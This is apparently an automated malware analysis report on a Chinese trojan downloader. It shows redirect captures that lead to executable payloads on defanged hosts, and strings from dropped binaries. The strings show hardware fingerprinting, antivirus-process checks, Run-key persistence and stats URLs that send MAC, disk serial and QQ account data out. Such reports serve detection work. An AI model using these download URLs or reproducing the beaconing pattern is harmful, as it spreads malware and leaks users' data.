<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe">here</a>.</h2>..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="../download/SubConfig.aspx?id1=8398" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />..</div>.. <div>.... </div>.. </form>..</body>..</html>....


GET /ffdy_238_63518.exe HTTP/1.1
Referer: hXXp://VVV.hanyueyr.com/ffdy_238_63518.exe
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: VVV.hanyueyr.com
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Dec 2014 05:13:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
0..


The Trojan connects to the servers at the following location(s):

1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
NjM1MTguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp
TguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
s.ZM!f
@.reloc
MSVCR80.dll
_crt_debugger_hook
Base64.dll
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
&.Gi0
%Program Files%\1.rar
emp\nsl40.tmp
1.rar
Grub4DOS Toolbox for Windows 0.1
am Files\nsu41.tmp
mp\nsl40.tmp
rogram Files\1.rar
ray.exe
360sd.exe
hXXp://VVV.bangshijz.com
hXXp://pchome.b0.upaiyun.com/1.ico
n/iplookup/iplookup.php
p://int.dpool.sina.com.cn/iplookup/iplookup.php
hXXp://idc.xn--r93a55o.cc/onlines_30863.exe
80.1123.exe
onlines_30863.exe
c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
%Program Files%
1419052427l238l63518.exe&_upt=6ec6a9a21419053027
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812_rwx_10004000_00001000:

callback%d

MM-liao8398.exe_824:

.text
`.rdata
@.data
.rsrc
SSSSh
FtPh
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
homeUrl
downUrl
C:\Windows\Temp\temp.icon
c://temp.icon
ProExe
DownloadUrl
ErrorUrl
AdvertUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
<4,$?7/'
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceTypeModifier: x
RemovableMedia: %d
CommandQueueing: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
F%D,3
OLEACC.dll
SHLWAPI.dll
WSOCK32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteA
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
VERSION.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
InternetOpenUrlA
HttpOpenRequestA
WININET.dll
.?AVCCmdTarget@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
zcÁ
00000000000000000001
%Program Files%\MM-liao8398.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
accKeyboardShortcut
mscoree.dll
ekernel32.dll
KERNEL32.DLL
DownloadInstall.Document
(*.*)
Output.prn$
(*.prn)|*.prn|
(*.*)|*.*||
1, 0, 0, 1
DownloadInstall.EXE

dts.exe_1940:

.text
`.rdata
@.data
.rsrc
@.reloc
8%u3P
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
RegDeleteKeyExW
E:\37WanWork\delphicode\vcLander\dts_channel\04
\Bin\lander.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
GdiplusShutdown
gdiplus.dll
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindCloseUrlCache
InternetCrackUrlW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
IPHLPAPI.DLL
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
zcÁ
.?AV?$CEventHandler@VCFormGame@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormGame@@P81@AEXIIJ@Z@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$CFEvent@VCCWebNotifyEventHandler@@VFCWebNotifyEventHandler@@VICWebNotifyEventHandler@@@@
.?AVCWebNotify@@
.?AVICWebNotifyEventHandler@@
.?AV?$CEventHandler@VCFormLogin@@P81@AEXIIJ@ZVICWebNotifyEventHandler@@@@
.?AV?$CCWebNotifyEventHandler@VCFormLogin@@P81@AEXIIJ@Z@@
.?AVCFormLogin@@
.?AVCSQLabel@@
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:E011ECCF633711E4B7B5BF9AF9EA42F2" xmpMM:DocumentID="xmp.did:E011ECD0633711E4B7B5BF9AF9EA42F2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E011ECCD633711E4B7B5BF9AF9EA42F2" stRef:documentID="xmp.did:E011ECCE633711E4B7B5BF9AF9EA42F2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Y
$$$&&&***)))$$$'''---"""((($$$###
 %&3-.5. 8/,7233./<52MDAQHEHD?GB?VNN_VS\PPNEH*$%UOJEA@/-,'"!
$&&#('', (-,,01&* ' ,(-,& *%*)$)("'&#%%
!!"#!"#!
!"...   "$$(** 0/%*)"$$$&&$&&%''
!"$%"%##&$$)($)((* %)**,,%*) ""#('#('')) "##'(
#"!" #&$ ""
"#*./' ,,10*,,$&&) ,*,-#%&
#$(-.',-
*# 8142).-'.1,4;
0165 --"$$
7167(-,&((
)  >@@8@@
,.. --577
(((&((#%% --
""'))387
%%%   )))$$$
[[[???...
((($$$"""$$$
$#644BBBFFF'%ìB#%h9FFFKHJJMK/.0///DHIEGGKMMLKOGLJ@>>PPPDBADCEKII&'%!##NOM999%&*EGG#%&)-.253
" $#%$""!!!
"$ÎE$$$'"#(') /0KHJJIKDDD134311CDB
)))***000))),,,
(((:::9:8:::@=?'(&'%F6FHHKKKBAC111!" KIH689, -GIJCA@ "#,**FFFIHD@BC@=?879IGGGED --022CCC=;;444324%&$***546<:9421(**POQMKKFFF(((%&"ECBGHL%'(USSHIGBBBWUT,,,(((IIIPRSKKKUUUSRT)'&=??POQVVV-., )( *,ACCBAC
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
ekernel32.dll
mscoree.dll
KERNEL32.DLL
hXXp://kf.37.com/
hXXp://dts.37.com
hXXp://bbs.37.com/index.php?gid=2447
wd_returnlogin=1
Software\Microsoft\Windows\CurrentVersion\Run
"%s" %s
hXXp://dts.37.com/gonglue/
ErrorUrl
hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1
hXXp://d.wanyouxi7.com/37/dts/official/app.ini
hXXp://d.wanyouxi7.com/37/dts/official/Setup_37dts.exe
%Y-%m-%d %H:%M:%S
%Y%m%d%H%M%S
refer=%s&uid=%s&version=%d&installtime=%s&runcount=%d&curtime=%s&showlogintype=3
hXXp://pay.37.com/select.php?gamename=dts&gameserver=%s&username=%s
iconAnimate.exe
@HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
LastUpgrade.ini
37LanderUpgrade.exe
Lander.ini
BHTTPDownloader
Content-Type: application/x-www-form-urlencoded; charset=UTF-8;
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%s\Connection
XXXXXX
QQmenu.exe
Txwu.exe
2006.exe
connetbar.exe
wbc.exe
sunflowerTools.exe
LBSserver.exe
TLnbLdr.exe
DeepinStatus.exe
\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
\SOFTWARE\TyDyy.com
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d
InstallStat.tmp
ActiveStat.tmp
%Y-%m-%d
hXXp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=%s&ext_1=%d&ext_2=%s&ext_3=%s&ext_4=%s&ext_5=%s&ext_6=%d&browser_type=%d&position=%d&ext_7=%s
UninstallStat.tmp
X-X-X-X
\\.\IDE21201.VXD
\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe
3.0.0.0
3, 0, 0, 0

iexplore.exe_1768:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

9158.exe_2088:

.text
`.rdata
@.data
.rsrc
unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.1.4
inflate 1.1.4 Copyright 1995-2002 Mark Adler
VERSION.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
?IsControlHaveSkin@CAppSysOperation@@UAEHXZ
?CleanBitmapMem@CAppSysOperation@@UAEHXZ
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z
?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z
?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z
?CleanSkin@CAppSysOperation@@UAEHPAX@Z
?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z
?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z
?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z
?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z
?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z
?CleanUp@CAppSysOperation@@UAEXXZ
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z
?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z
?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z
?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B
?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z
?LoadSkin@CAppSysOperation@@UAEHPAX@Z
?FitBitmapSize@CAppSysOperation@@UAEXXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B
?GetBitmapHeight@CAppSysOperation@@QAEHXZ
?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
?WbBase_Login@CWeiboModule@@QAEHHPBD0@Z
?WB_RelationOperation@CWeiboModule@@QAEH_J00HHH@Z
CWeiboClient.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
FSkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s
%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................%f*%d = %d
//player.ini
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
filter.zip
serverlist.txt
car.xml
flower.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;
yqh:expression((this.offsetWidth > this.offsetHeight)?
(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):
(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
<div class="img50"><img src='%s' /></div></body>
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
help.xml
sysmessage.xml
skinres\TG\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
VideoOut30.ocx
VideoIn30.ocx
9158KTVAudioOut.ocx
9158KTVAudioIn.ocx
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
<?xml version="1.0" encoding="GB2312"?>%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:%s^|$|^%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
lobby.ini
skinres\skin.ini
//HallClose.ini
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=1 scrollDelay=2 direction=left></MARQUEE></div></body></html>
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
%s?url=%s
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
